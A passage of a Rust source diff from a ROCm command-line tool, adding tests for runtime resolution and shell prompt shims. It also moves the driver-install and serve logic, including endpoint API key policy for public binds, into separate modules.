write_test_pip_runtime( + &paths, + "release-pip-gfx120x-all", + "therock-release:gfx120X-all", + "7.13.0", + 1, + )?; + + let config = RocmCliConfig { + active_runtime_key: Some("release-pip-gfx120x-all".to_owned()), + ..RocmCliConfig::default() + }; + assert_eq!( + resolve_engine_install_runtime_id(&paths, &config, "vllm", None)?, + "release-pip-gfx120x-all" + ); + assert_eq!( + resolve_engine_install_runtime_id( + &paths, + &config, + "vllm", + Some("therock-release:gfx120X-all".to_owned()) + )?, + "release-pip-gfx120x-all" + ); + let _ = fs::remove_dir_all(root); + Ok(()) + } + + #[test] + fn env_root_for_runtime_uses_runtime_install_root() -> Result<()> { + let (root, paths) = test_paths("engine-env-root-runtime"); + let manifest = write_test_pip_runtime( + &paths, + "release-pip-gfx120x-all", + "therock-release:gfx120X-all", + "7.13.0", + 1, + )?; + + let engine_root = env_root_for_runtime(&paths, "vllm", &manifest.runtime_key)?; + + assert_eq!(engine_root, Some(manifest.install_root.join("engines"))); + assert_eq!( + env_root_for_runtime(&paths, "lemonade", &manifest.runtime_key)?, + None + ); + let _ = fs::remove_dir_all(root); + Ok(()) + } + + #[test] + fn env_root_for_engine_install_uses_active_runtime_root_for_lemonade() -> Result<()> { + let (root, paths) = test_paths("lemonade-engine-env-root-runtime"); + let manifest = write_test_pip_runtime( + &paths, + "release-pip-gfx120x-all", + "therock-release:gfx120X-all", + "7.13.0", + 1, + )?; + let config = RocmCliConfig { + active_runtime_key: Some(manifest.runtime_key.clone()), + ..RocmCliConfig::default() + }; + + let engine_root = + env_root_for_engine_install(&paths, &config, "lemonade", "lemonade-embeddable")?; + + assert_eq!(engine_root, Some(manifest.install_root.join("engines"))); + let _ = fs::remove_dir_all(root); + Ok(()) + } + + #[test] + fn engine_runtime_selection_rejects_ambiguous_default_runtime_id() -> Result<()> { + let (root, paths) = test_paths("engine-runtime-ambiguous-default"); + write_test_pip_runtime( + &paths, + "release-pip-gfx120x-all", + "therock-release:gfx120X-all", + "7.13.0", + 1, + )?; + write_test_pip_runtime( + &paths, + "vllm-source-pip-gfx120x-all", + "therock-release:gfx120X-all", + "7.13.0", + 2, + )?; + let config = RocmCliConfig { + default_runtime_id: Some("therock-release:gfx120X-all".to_owned()), + ..RocmCliConfig::default() + }; + + let error = resolve_engine_install_runtime_id(&paths, &config, "vllm", None) + .unwrap_err() + .to_string(); + assert!(error.contains("matches multiple installed runtimes")); + assert!(error.contains("rocm runtimes activate ")); + + let selection = resolve_engine_selection(&config, "vllm", None, None); + let error = validate_engine_selection_runtime(&paths, selection) + .unwrap_err() + .to_string(); + assert!(error.contains("matches multiple installed runtimes")); + + let selection = + resolve_engine_selection(&config, "vllm", Some("release-pip-gfx120x-all"), None); + let selection = validate_engine_selection_runtime(&paths, selection)?; + assert_eq!( + selection.runtime_id.as_deref(), + Some("release-pip-gfx120x-all") + ); + let _ = fs::remove_dir_all(root); + Ok(()) + } + + /// The interpreter names its runtime where the shared `runtime_id` cannot. + /// + /// This is the cross-wiring that settled the active runtime's torch into an + /// older runtime's environment: the engine's env id drops the version, so + /// the environment belongs to 7.13.0 while the caller's selector says only + /// "release, gfx94X-dcgpu". Resolving by install root has to pick 7.13.0. + #[test] + fn the_runtime_is_resolved_by_its_interpreter_not_the_shared_runtime_id() { + let manifests = side_by_side_runtimes(); + + assert_eq!( + runtime_manifest_for_selector(&manifests, "therock-release:gfx94X-dcgpu") + .map(|manifest| manifest.runtime_key.as_str()), + None, + "the shared runtime_id names two runtimes, so a selector cannot resolve it" + ); + assert_eq!( + runtime_key_owning_python( + &manifests, + Path::new("/runtimes/release-wheel-gfx94x-dcgpu-7-13-0/bin/python3"), + ), + Some("release-wheel-gfx94x-dcgpu-7-13-0"), + "the interpreter's install root names the runtime being settled" + ); + } + + /// An interpreter outside every install root leaves the caller's selector alone. + /// + /// External and self-managed environments live outside the registry, and + /// inventing an owner for them would settle a runtime nobody asked about. + #[test] + fn an_interpreter_outside_every_install_root_owns_nothing() { + assert_eq!( + runtime_key_owning_python( + &side_by_side_runtimes(), + Path::new("/opt/somewhere-else/bin/python3"), + ), + None + ); + } + + /// A prefix match alone is ambiguous once roots nest, so the longest wins. + #[test] + fn the_longest_containing_install_root_owns_the_interpreter() { + let mut outer = test_runtime_manifest_for_update( + "outer", + "therock-release:gfx94X-dcgpu", + "gfx94X-dcgpu", + "7.13.0", + ); + outer.install_root = PathBuf::from("/runtimes"); + let mut inner = test_runtime_manifest_for_update( + "inner", + "therock-release:gfx94X-dcgpu", + "gfx94X-dcgpu", + "7.14.0", + ); + inner.install_root = PathBuf::from("/runtimes/release-wheel-gfx94x-dcgpu-7-14-0"); + + assert_eq!( + runtime_key_owning_python( + &[outer, inner], + Path::new("/runtimes/release-wheel-gfx94x-dcgpu-7-14-0/bin/python3"), + ), + Some("inner") + ); + } + + #[test] + fn bash_shim_sources_the_user_rc_and_prefixes_the_prompt() { + let dir = PathBuf::from("/tmp/shim"); + let shim = engine_shell_prompt_shim("/bin/bash", "(rocm:vllm) ", &dir, None) + .expect("bash must be shimmable"); + + // `--rcfile` is what makes bash run our file at all; `-i` keeps it + // interactive even if stdin is not a terminal in some caller. + assert_eq!( + shim.args, + vec![ + "--rcfile".to_owned(), + dir.join("engine-shell.bash").display().to_string(), + "-i".to_owned(), + ] + ); + assert!(shim.envs.is_empty(), "bash needs no extra env"); + + let (path, contents) = shim.files.first().expect("one rc file"); + assert_eq!(path, &dir.join("engine-shell.bash")); + assert!( + contents.contains("$HOME/.bashrc"), + "must restore the user's own rc:\n{contents}" + ); + // bash sources the system file itself even with --rcfile, so sourcing it + // here too would apply it twice. + assert!( + !contents.contains("/etc/bash.bashrc"), + "must not re-source the system rc:\n{contents}" + ); + assert!( + contents.contains("PS1='(rocm:vllm) '\"$PS1\""), + "must prefix rather than replace the prompt:\n{contents}" + ); + } + + #[test] + fn zsh_shim_restores_both_startup_files() { + let dir = PathBuf::from("/tmp/shim"); + let shim = engine_shell_prompt_shim("/usr/bin/zsh", "(rocm:vllm) ", &dir, None) + .expect("zsh must be shimmable"); + + assert!(shim.args.is_empty(), "zsh is redirected via env, not argv"); + assert!( + shim.envs + .contains(&("ZDOTDIR".to_owned(), dir.display().to_string())), + "zsh needs ZDOTDIR pointed at the shim dir: {:?}", + shim.envs + ); + + let names: Vec<_> = shim + .files + .iter() + .map(|(path, _)| path.file_name().unwrap().to_str().unwrap()) + .collect(); + // Redirecting ZDOTDIR hides BOTH of the user's files. Missing `.zshenv` + // would strip their exports — worse than the unmarked prompt this fixes. + assert!( + names.contains(&".zshenv") && names.contains(&".zshrc"), + "both startup files must be restored, got {names:?}" + ); + for (path, contents) in &shim.files { + assert!( + contents.contains("ROCM_CLI_ORIG_ZDOTDIR:-$HOME"), + "{} must fall back to $HOME:\n{contents}", + path.display() + ); + } + let zshrc = shim + .files + .iter() + .find(|(path, _)| path.ends_with(".zshrc")) + .map(|(_, contents)| contents) + .expect(".zshrc present"); + assert!( + zshrc.contains("PROMPT='(rocm:vllm) '$PROMPT"), + "must prefix rather than replace the prompt:\n{zshrc}" + ); + } + + #[test] + fn zsh_shim_passes_through_an_existing_zdotdir() { + let dir = PathBuf::from("/tmp/shim"); + let shim = engine_shell_prompt_shim("zsh", "(rocm:vllm) ", &dir, Some("/home/u/.zsh")) + .expect("zsh must be shimmable"); + assert!( + shim.envs.contains(&( + "ROCM_CLI_ORIG_ZDOTDIR".to_owned(), + "/home/u/.zsh".to_owned() + )), + "a caller's ZDOTDIR must survive so the shim can find their files: {:?}", + shim.envs + ); + + // A blank value is not a location; the shim's $HOME fallback must win. + let blank = engine_shell_prompt_shim("zsh", "(rocm:vllm) ", &dir, Some(" ")) + .expect("zsh must be shimmable"); + assert!( + !blank + .envs + .iter() + .any(|(key, _)| key == "ROCM_CLI_ORIG_ZDOTDIR"), + "a blank ZDOTDIR must not be passed through: {:?}", + blank.envs + ); + } + + #[test] + fn shells_without_a_safe_shim_are_left_alone() { + // Guessing at an unknown shell's startup is worse than the banner: these + // must opt out rather than have a marker forced on them. + let dir = PathBuf::from("/tmp/shim"); + for shell in [ + "/bin/sh", + "/bin/dash", + "/usr/bin/fish", + "cmd", + "powershell", + "pwsh", + "", + ] { + assert!( + engine_shell_prompt_shim(shell, "(rocm:vllm) ", &dir, None).is_none(), + "{shell} should not be shimmed" + ); + } + } + + #[test] + fn shim_matches_on_the_shell_name_not_the_full_path() { + let dir = PathBuf::from("/tmp/shim"); + for shell in ["bash", "/bin/bash", "/usr/local/bin/bash"] { + assert!( + engine_shell_prompt_shim(shell, "(rocm:x) ", &dir, None).is_some(), + "{shell} should resolve to bash" + ); + } + } +} diff --git a/apps/rocm/src/main.rs b/apps/rocm/src/main.rs index d486ee8bc..c9d62a78f 100644 --- a/apps/rocm/src/main.rs +++ b/apps/rocm/src/main.rs @@ -10,20 +10,32 @@ mod cli_report; mod comfyui; mod dash; mod dash_seam; +mod driver_install; mod endpoint_keys; +mod engines_cmd; mod logging; mod provider_keys; mod providers; mod remote; +mod serve_cmd; mod serve_summary; mod storage; mod therock; mod uninstall; -// Per-command handler fns mechanically relocated into modules. +// Per-command handlers mechanically relocated into modules — fns, plus the +// types (e.g. `ServeArgs`, driver-plan types) that moved with their cluster. // Dispatch call sites stay byte-identical via these re-imports (upstream-sync -// mergeability); only the fn definitions moved out of main.rs. +// mergeability); the exception is `select_serve_engine` (a fn, not a type), +// re-imported because `assess_model_for_host` calls it directly, not because +// dispatch needs it. use crate::automations::automations; +use crate::driver_install::{install_driver, reconcile_driver_install}; +use crate::engines_cmd::{ + engine_manages_own_runtime, engines, env_root_for_engine_install, env_root_for_service, + runtime_key_for_python, runtime_manifest_for_selector, +}; +use crate::serve_cmd::{ServeArgs, select_serve_engine, serve}; use crate::uninstall::uninstall; use anyhow::{Context, Result, bail}; @@ -40,24 +52,20 @@ use rocm_core::{ PERMISSIONS_MODE_ASK, PERMISSIONS_MODE_FULL_ACCESS, RocmCliConfig, TELEMETRY_MODE_LOCAL, TELEMETRY_MODE_OFF, WatcherMode, append_audit_event, builtin_model_recipes, builtin_watcher, builtin_watchers, connect_tcp_stream, daemon_binary_path, default_engine_for_platform, - default_interactive_shell_program, detect_host_gfx_target, detect_host_gpu_summary, - engine_binary_path, engine_plugin_dirs, format_host_port, format_http_base_url, - generate_service_id, interactive_terminal, load_model_recipe_registry, + detect_host_gfx_target, detect_host_gpu_summary, engine_binary_path, engine_plugin_dirs, + format_host_port, format_http_base_url, interactive_terminal, load_model_recipe_registry, load_recent_audit_events, load_recent_automation_events, load_recent_automation_proposals, managed_pip_cache_dir, managed_service_endpoint_readiness, model_artifact_cache_status, model_catalog_platforms, model_recipe_featured, model_recipe_target_platform_label, normalize_therock_family, platform_matches_gfx_family, - preferred_serve_engine_for_host_gpu_summary, prepend_runtime_path, process_is_running, - read_http_response_bounded, resolve_builtin_model_recipe, resolve_model_recipe, - runtime_install_root_is_protected, runtime_path_is_same_or_inside, - runtime_python_activation_hint, runtime_python_env_bin_dir, runtime_python_executable_in_env, - shell_command_for_host, uv_cache_source, write_all_tcp_stream, + preferred_serve_engine_for_host_gpu_summary, process_is_running, read_http_response_bounded, + resolve_builtin_model_recipe, runtime_install_root_is_protected, + runtime_python_executable_in_env, uv_cache_source, write_all_tcp_stream, }; use rocm_engine_protocol::{ DEFAULT_LOG_TAIL_LINES, DetectRequest, DetectResponse, DevicePolicy, - ENGINE_RECIPE_CONTRACT_VERSION, EngineMethod, EnginePluginDescriptor, EngineRecipeEndpointHint, - EngineRecipeHint, EngineRecipeUnsupportedCombinationHint, EngineRequestEnvelope, - EngineResponseEnvelope, GpuSelection, InstallRequest, InstallResponse, ResolveModelRequest, + ENGINE_RECIPE_CONTRACT_VERSION, EngineMethod, EnginePluginDescriptor, EngineRecipeHint, + EngineRequestEnvelope, EngineResponseEnvelope, GpuSelection, InstallRequest, InstallResponse, ResolveModelResponse, StopRequest, StopResponse, }; use serde::de::DeserializeOwned; @@ -3597,3595 +3605,366 @@ fn install(target: InstallTarget) -> Result<()> { Ok(()) } -fn install_driver( - paths: &AppPaths, - dkms: bool, - yes: bool, - dry_run: bool, -) -> std::result::Result { - let examine = - ExamineSummary::gather().map_err(|source| DriverInstallError::new(source, false))?; - let os_release = read_os_release().unwrap_or_default(); - // The only place the real privilege level is read; every builder below takes - // it as a parameter so both branches stay testable on any host. - let plan = - build_driver_install_plan(&examine, &os_release, dkms, PrivilegeEscalation::detect()); - let mut output = render_driver_install_plan(&plan, yes, dry_run); - if !yes || dry_run || !plan.supported || !plan.mutating { - return Ok(DriverInstallResult { - output, - executed: false, - }); +/// GPU/device warnings folded into the interactive deployment summary. Mirrors the +/// inline warnings printed in the plain serve plan, in the same order. +#[allow(clippy::too_many_arguments)] +fn collect_serve_notes( + cpu_only: bool, + gpu_selection: &GpuSelection, + rocr_visible_devices_set: bool, + gpu_indices: &[u32], + gpu_vram: Option<&[GpuVramUsage]>, + engine_flag_note: Option<&str>, + host_gpu_summary: Option<&rocm_core::HostGpuSummary>, + engine_is_vllm: bool, +) -> Vec { + let mut notes = Vec::new(); + // An engine-scoped flag the selected engine cannot honor must be reported here + // too: the summary path is what an interactive `rocm serve` actually prints, so + // a note only emitted on the plan path would never reach that user. + if let Some(note) = engine_flag_note { + notes.push(note.to_owned()); } - - let boot_id = current_boot_id(); - let mut state = DriverInstallState { - approved_at_unix_ms: rocm_core::unix_time_millis(), - executed_at_unix_ms: None, - pre_driver: examine.driver, - post_driver: None, - boot_id_at_execution: boot_id, - reboot_required: plan.reboot_required, - reboot_observed: false, - commands: plan.execution_commands(), - reconciled_at_unix_ms: None, - reconciliation: None, - }; - write_driver_install_state(paths, &state) - .map_err(|source| DriverInstallError::new(source, false))?; - - execute_driver_install_plan( - &plan, - &mut state, - run_driver_shell_command, - |state| write_driver_install_state(paths, state), - || ExamineSummary::gather().map(|summary| summary.driver), - ) - .map_err(|source| DriverInstallError::new(source, true))?; - - let report = cli_report::ActionReport::new("driver install completed") - .detail("reboot_required", plan.reboot_required) - .detail("state", driver_install_state_path(paths).display()); - output.push_str(&report.render()); - Ok(DriverInstallResult { - output, - executed: true, - }) -} - -fn execute_driver_install_plan( - plan: &DriverInstallPlan, - state: &mut DriverInstallState, - mut run: Run, - mut persist: Persist, - gather_post_driver: Gather, -) -> Result<()> -where - Run: FnMut(&str) -> Result<()>, - Persist: FnMut(&DriverInstallState) -> Result<()>, - Gather: FnOnce() -> Result, -{ - for command in &plan.commands { - if plan.reboot_required && command.phase == DriverCommandPhase::Verify { - continue; + if cpu_only { + if matches!(gpu_selection, GpuSelection::Index(_)) { + notes.push( + "--gpu was ignored because --device cpu_only runs the model on CPU".to_owned(), + ); + } + } else { + if rocr_visible_devices_set { + notes.push( + "ROCR_VISIBLE_DEVICES is set; the selected amd-smi ordinal is exported via \ + HIP_VISIBLE_DEVICES, which the runtime interprets relative to the ROCR-visible \ + set, so the device the engine binds may differ. Verify the selected GPU or unset \ + ROCR_VISIBLE_DEVICES." + .to_owned(), + ); + } + if let Some(warning) = serve_gpu_low_memory_warning(gpu_indices, gpu_vram, host_gpu_summary) + { + notes.push(warning); + // vLLM's total-VRAM reservation is what turns a busy card into an OOM; + // pair the generic warning with the concrete knob that avoids it. + if engine_is_vllm { + notes.push(rocm_core::VLLM_GPU_MEMORY_UTILIZATION_HINT.to_owned()); + } } - run(&command.command) - .with_context(|| format!("driver command failed: {}", command.command))?; } - - state.executed_at_unix_ms = Some(rocm_core::unix_time_millis()); - state.reboot_required = plan.reboot_required; - state.reboot_observed = driver_reboot_observed(state.boot_id_at_execution.as_deref()); - persist(state)?; - - let post_driver = gather_post_driver()?; - state.post_driver = Some(post_driver); - persist(state)?; - Ok(()) + notes } -fn reconcile_driver_install(paths: &AppPaths) -> Result { - let Some(mut state) = read_driver_install_state(paths)? else { - let mut output = String::new(); - let _ = writeln!(output, "driver install reconciliation"); - let _ = writeln!( - output, - " state: {}", - driver_install_state_path(paths).display() - ); - let _ = writeln!(output, " approval: not required"); - let _ = writeln!(output, " privileged_commands: "); - let _ = writeln!(output, " status: no prior driver execution state found"); - let _ = writeln!( - output, - " action: run `rocm install driver --dkms` to review the native driver plan" +fn validate_bind_host(host: &str, allow_public_bind: bool) -> Result<()> { + if !is_loopback_host(host) && !allow_public_bind { + bail!( + "`rocm serve --host {host}` is not loopback; pass `--allow-public-bind` before binding a non-local interface" ); - return Ok(output); - }; - let examine = ExamineSummary::gather()?; - let checks = passive_driver_checks(); - reconcile_driver_install_state(paths, &mut state, examine.driver, current_boot_id(), checks) + } + Ok(()) } -fn reconcile_driver_install_state( - paths: &AppPaths, - state: &mut DriverInstallState, - driver: rocm_core::DriverSummary, - current_boot_id: Option, - checks: Vec, -) -> Result { - let reboot_observed = state - .boot_id_at_execution - .as_deref() - .zip(current_boot_id.as_deref()) - .is_some_and(|(executed, current)| executed != current); - state.reboot_observed = reboot_observed; - state.post_driver = Some(driver.clone()); - let at_unix_ms = rocm_core::unix_time_millis(); - state.reconciled_at_unix_ms = Some(at_unix_ms); - let check_summary = summarize_driver_passive_checks(&checks); - state.reconciliation = Some(DriverReconciliationState { - at_unix_ms, - driver, - reboot_observed, - check_summary, - checks, - }); - write_driver_install_state(paths, state)?; - Ok(render_driver_reconciliation(paths, state)) +/// Inverse of [`rocm_engine_protocol::is_public_bind_host`], which owns the +/// policy so `rocmd` classifies a recorded `host` identically when it respawns +/// the service. +fn is_loopback_host(host: &str) -> bool { + !rocm_engine_protocol::is_public_bind_host(host) } -fn render_driver_reconciliation(paths: &AppPaths, state: &DriverInstallState) -> String { - let mut output = String::new(); - let _ = writeln!(output, "driver install reconciliation"); - let _ = writeln!( - output, - " state: {}", - driver_install_state_path(paths).display() - ); - let _ = writeln!(output, " approval: not required"); - let _ = writeln!(output, " privileged_commands: "); - let _ = writeln!( - output, - " approved_at_unix_ms: {}", - state.approved_at_unix_ms - ); - let _ = writeln!( - output, - " executed_at_unix_ms: {}", - state - .executed_at_unix_ms - .map_or_else(|| "".to_owned(), |value| value.to_string()) - ); - let _ = writeln!(output, " reboot_required: {}", state.reboot_required); - let _ = writeln!(output, " reboot_observed: {}", state.reboot_observed); - if let Some(reconciliation) = &state.reconciliation { - let _ = writeln!( - output, - " reconciled_at_unix_ms: {}", - reconciliation.at_unix_ms - ); - let _ = writeln!(output, " driver_status: {}", reconciliation.driver.status); - let _ = writeln!( - output, - " driver_detail: {}", - reconciliation - .driver - .detail - .as_deref() - .unwrap_or("") - ); - let _ = writeln!( - output, - " passive_check_summary: total={} present={} missing={}", - reconciliation.check_summary.total, - reconciliation.check_summary.present, - reconciliation.check_summary.missing - ); - if reconciliation.checks.is_empty() { - let _ = writeln!(output, " passive_checks: "); - } else { - let _ = writeln!(output, " passive_checks:"); - for check in &reconciliation.checks { - let _ = writeln!( - output, - " {}: {} ({})", - check.name, check.status, check.detail +/// Resolve the API key that will guard this endpoint, applying the +/// loopback-vs-public policy for `rocm serve`. +/// +/// - **Loopback host** → `None`: local serving stays credential-free (the +/// unchanged default). Any key supplied for a loopback bind is ignored and +/// nothing is persisted — loopback needs no auth. +/// - **Public host** → `Some(key)`: use the user-supplied key when present, +/// otherwise generate a strong random one so a public endpoint can never come +/// up anonymous. An empty/whitespace supplied key is rejected rather than +/// silently treated as "no auth". +/// - **`required`** → treat a loopback bind as public for this purpose. +/// +/// That last case exists because "loopback" is a statement about the bind +/// address, not about who can reach the port. Publishing the port onto a +/// tailnet, proxying it, or mapping it out of a container all leave the bind +/// loopback while widening the audience — and the policy above would then hand +/// out an unauthenticated endpoint. Whoever widens the reach is responsible for +/// asking for the credential, so this is an explicit flag rather than a guess. +fn resolve_endpoint_auth( + host: &str, + supplied: Option<&str>, + required: bool, +) -> Result> { + if is_loopback_host(host) && !required { + return Ok(None); + } + match supplied { + Some(raw) => { + let trimmed = raw.trim(); + if trimmed.is_empty() { + bail!( + "`rocm serve --api-key` (or ROCM_SERVE_API_KEY) was empty; a public \ + endpoint must be protected by a non-empty API key" ); } + // The key is later interpolated verbatim into raw `Authorization: + // Bearer {key}\r\n` header lines; reject a control character (e.g. an + // embedded CR/LF) here so a crafted key cannot inject extra headers. + if rocm_core::endpoint_api_key_has_forbidden_chars(trimmed) { + bail!( + "`rocm serve --api-key` (or ROCM_SERVE_API_KEY) contained a control \ + character such as a carriage return or newline; an endpoint API key \ + must be a single line of printable characters" + ); + } + Ok(Some(trimmed.to_owned())) } - if state.reboot_required && !state.reboot_observed { - let _ = writeln!( - output, - " action: reboot is still required before post-install checks are meaningful" - ); - } else if reconciliation - .checks - .iter() - .any(|check| check.status != "present") - { - let _ = writeln!( - output, - " action: reconciliation recorded missing passive checks; run `rocm examine` and inspect driver logs" - ); - } else { - let _ = writeln!( - output, - " action: reconciliation complete; run `rocm examine` for the full host summary" - ); - } + None => Ok(Some(rocm_core::generate_endpoint_api_key())), } - output } -fn summarize_driver_passive_checks(checks: &[DriverPassiveCheck]) -> DriverPassiveCheckSummary { - let total = checks.len(); - let present = checks - .iter() - .filter(|check| check.status == "present") - .count(); - DriverPassiveCheckSummary { - total, - present, - missing: total.saturating_sub(present), +/// When an equivalent managed service is already running, the endpoint key +/// serve() freshly stored for this attempt is unused — drop it so it is not +/// orphaned in storage. The already-running service keeps its own key. +/// Best-effort and idempotent; a loopback attempt (`freshly_stored == None`) +/// is a no-op. +fn drop_orphaned_endpoint_key_on_already_running( + paths: &AppPaths, + service_id: &str, + freshly_stored: Option<&str>, +) { + if freshly_stored.is_some() { + endpoint_keys::clear_endpoint_api_key(paths, service_id); } } -fn passive_driver_checks() -> Vec { - if !rocm_core::runtime_is_linux() { - return Vec::new(); +/// Reject engine/platform combinations that cannot enforce a public endpoint's +/// API key, so a public bind fails closed instead of coming up unauthenticated. +/// +/// The one such case today: Windows managed Lemonade. Its server reads the +/// value-typed `LEMONADE_API_KEY` env var, but the Windows detached-spawn +/// primitive only carries path-valued env overrides, so the key never reaches it. +/// vLLM enforces auth on every platform (`VLLM_API_KEY`), and loopback binds +/// (`public_bind == false`) need no key — both pass. `is_windows` is a parameter +/// so both branches are unit-testable off-Windows. +fn ensure_public_bind_engine_supported( + engine: &str, + public_bind: bool, + is_windows: bool, +) -> Result<()> { + if public_bind && is_windows && engine == "lemonade" { + bail!( + "public binding with the lemonade engine is not supported on Windows: the endpoint \ + API key cannot be enforced there. Use `--engine vllm`, or bind a loopback host \ + (the default 127.0.0.1)." + ); } - vec![ - passive_path_check("/sys/module/amdgpu", "amdgpu kernel module path"), - passive_path_check("/dev/kfd", "KFD device node"), - passive_render_node_check(), - ] + Ok(()) } -fn passive_path_check(path: &str, detail: &str) -> DriverPassiveCheck { - DriverPassiveCheck { - name: path.to_owned(), - status: if Path::new(path).exists() { - "present" - } else { - "missing" - } - .to_owned(), - detail: detail.to_owned(), +/// Refuse to (re)spawn a managed service recorded on a public host when its +/// endpoint API key is gone, so a respawn cannot reopen the endpoint anonymously. +/// +/// `serve()` applies the loopback-vs-public policy once, via +/// [`resolve_endpoint_auth`], and persists the resulting key. Every later spawn +/// — `rocm services restart`, and `rocmd`'s recovery supervisor — reads that key +/// file back and would otherwise treat "no key file" as "no auth wanted", +/// silently downgrading a protected public endpoint to an open one. The real +/// invariant is a property of the *host*, not of the file: a non-loopback bind +/// must always be authenticated. +/// +/// The gap is reachable through ordinary commands, because a stop deletes the +/// key file and `rocm services restart` accepts a stopped service id (its help +/// points at `rocm services list --all`). +/// +/// `key_present` is a plain `bool` rather than a path so both branches are +/// unit-testable without touching the filesystem, mirroring `is_windows` in +/// [`ensure_public_bind_engine_supported`]. +fn ensure_public_service_has_endpoint_key( + host: &str, + key_present: bool, + requires_api_key: bool, +) -> Result<()> { + // Two ways a service can need a key. A public bind is the obvious one. The + // other is a service that asked for auth on a loopback bind, because + // something outside this process republishes the port — a tailnet publish + // survives a reboot, let alone a restart, so "loopback" stops meaning + // "only this machine" and the bind address can no longer be trusted to + // answer the question on its own. + if requires_api_key && !key_present { + bail!( + "managed service was launched with `--require-api-key` but has no endpoint API key, \ + so restarting it would reopen it without authentication. Something outside this \ + machine may still be publishing its port. The key is dropped when a service stops \ + and cannot be recovered. Launch it again with \ + `rocm serve --require-api-key` (add `--api-key `, or set ROCM_SERVE_API_KEY, \ + to choose the key instead of generating one)." + ); } -} - -fn passive_render_node_check() -> DriverPassiveCheck { - let present = fs::read_dir("/dev/dri") - .ok() - .into_iter() - .flat_map(|entries| entries.filter_map(std::result::Result::ok)) - .any(|entry| { - entry - .file_name() - .to_str() - .is_some_and(|name| name.starts_with("renderD")) - }); - DriverPassiveCheck { - name: "/dev/dri/renderD*".to_owned(), - status: if present { "present" } else { "missing" }.to_owned(), - detail: "DRM render node".to_owned(), + if rocm_engine_protocol::is_public_bind_host(host) && !key_present { + bail!( + "managed service is bound to the public host `{host}` but has no endpoint API key, \ + so restarting it would reopen it without authentication. The key is dropped when a \ + service stops and cannot be recovered. Launch it again with \ + `rocm serve --host {host} --allow-public-bind` (add `--api-key `, or set \ + ROCM_SERVE_API_KEY, to choose the key instead of generating one)." + ); } + Ok(()) } -struct DriverInstallResult { - output: String, - executed: bool, -} - -struct DriverInstallError { - source: anyhow::Error, - executed: bool, -} - -impl DriverInstallError { - const fn new(source: anyhow::Error, executed: bool) -> Self { - Self { source, executed } +/// Write `contents` to `path` with owner-only (0600) permissions on Unix so a +/// secret is not world-readable. On non-Unix, default permissions apply. +pub(crate) fn write_private_file_0600(path: &Path, contents: &[u8]) -> Result<()> { + if let Some(parent) = path.parent() { + fs::create_dir_all(parent)?; } -} - -#[derive(Debug, Clone)] -struct DriverInstallPlan { - supported: bool, - mutating: bool, - policy: String, - os_id: String, - version_id: String, - codename: String, - repo_version: String, - reason: String, - preflight_checks: Vec, - commands: Vec, - checks: Vec, - /// Whether the host must reboot before the verification steps mean anything. - /// - /// True for the kernel-module paths: an amdgpu DKMS build is not live until - /// the machine comes back up. False on WSL2, where nothing kernel-side - /// changes — ROCDXG is a userspace library and `ldconfig` publishes it - /// immediately, so telling the user to reboot would be wrong. - reboot_required: bool, -} - -impl DriverInstallPlan { - fn execution_commands(&self) -> Vec { - self.commands - .iter() - .filter(|command| { - matches!( - command.phase, - DriverCommandPhase::Prepare | DriverCommandPhase::Execute - ) - }) - .map(|command| command.command.clone()) - .collect() + #[cfg(unix)] + { + use std::os::unix::fs::OpenOptionsExt as _; + let mut file = fs::OpenOptions::new() + .write(true) + .create(true) + .truncate(true) + .mode(0o600) + .open(path)?; + std::io::Write::write_all(&mut file, contents)?; } + #[cfg(not(unix))] + { + fs::write(path, contents)?; + } + Ok(()) } -#[derive(Debug, Clone, Copy, Eq, PartialEq)] -enum DriverCommandPhase { - Prepare, - Execute, - Verify, -} - -#[derive(Debug, Clone)] -struct DriverPlanCommand { - phase: DriverCommandPhase, - command: String, +#[cfg(not(windows))] +fn detach_background_command(command: &mut ProcessCommand) { + rocm_core::detach_command_session(command); } -/// How a generated driver command is expected to reach root. -/// -/// The driver plan is a list of shell lines, so escalation is a text prefix -/// rather than an argv decision (contrast `openmpi::InstallCommand`, whose -/// commands are argv vectors and can prepend `sudo` structurally). Prefixing -/// unconditionally is what made `install driver` unusable on the hosts it is -/// most needed on: containers and minimal cloud images run as uid 0 with no -/// `sudo` binary, so every command died with `sudo: not found` before any -/// driver work happened. -/// -/// This is resolved when the plan is BUILT, not when it runs, so that the plan -/// `--dry-run` prints, the plan the approval prompt shows, and the commands -/// persisted into `state.json` are all the commands that actually execute. -#[derive(Debug, Clone, Copy, Eq, PartialEq)] -enum PrivilegeEscalation { - /// Not root: privileged commands need a `sudo` prefix. - Sudo, - /// Already uid 0: `sudo` is unnecessary, and may not even be installed. - AlreadyRoot, -} - -impl PrivilegeEscalation { - /// Read the current process's privilege level. - /// - /// Only ever called on the production path; every plan builder takes the - /// escalation as a parameter so both branches are testable on any host. - fn detect() -> Self { - if rocm_core::openmpi::running_as_root() { - Self::AlreadyRoot - } else { - Self::Sudo - } +#[cfg(not(windows))] +fn attach_background_stdio(command: &mut ProcessCommand, log_path: Option<&Path>) -> Result<()> { + if let Some(log_path) = log_path { + let log = fs::OpenOptions::new() + .create(true) + .append(true) + .open(log_path) + .with_context(|| format!("failed to open {}", log_path.display()))?; + command + .stdout(Stdio::from(log.try_clone()?)) + .stderr(Stdio::from(log)); + } else { + command.stdout(Stdio::null()).stderr(Stdio::null()); } + Ok(()) +} - /// The prefix to place before a command that must run as root — `"sudo "`, - /// or nothing at all when the process already is root. Includes the - /// trailing space so it composes directly into a command string. - const fn prefix(self) -> &'static str { - match self { - Self::Sudo => "sudo ", - Self::AlreadyRoot => "", +#[cfg(not(windows))] +fn managed_engine_startup_failure_detail(status: ExitStatus, log_path: &Path) -> String { + let mut recent_lines = read_optional_tail_lines(log_path, 80, "service log"); + if recent_lines.is_empty() { + for _ in 0..5 { + thread::sleep(Duration::from_millis(120)); + recent_lines = read_optional_tail_lines(log_path, 80, "service log"); + if !recent_lines.is_empty() { + break; + } } } - - /// Whether a plan built under this escalation depends on `sudo` being - /// installed. Drives the preflight list, so it does not claim a - /// precondition the plan is not relying on. - const fn needs_sudo_binary(self) -> bool { - matches!(self, Self::Sudo) + if recent_lines.is_empty() { + return format!( + "managed engine exited immediately with status {status}; inspect {}", + log_path.display() + ); } + format!( + "managed engine exited immediately with status {status}; inspect {}\n\nrecent startup log output:\n{}", + log_path.display(), + recent_lines.join("\n") + ) } - -#[derive(Debug, Clone, Serialize, Deserialize)] -struct DriverInstallState { - approved_at_unix_ms: u128, - executed_at_unix_ms: Option, - pre_driver: rocm_core::DriverSummary, - post_driver: Option, - boot_id_at_execution: Option, - reboot_required: bool, - reboot_observed: bool, - 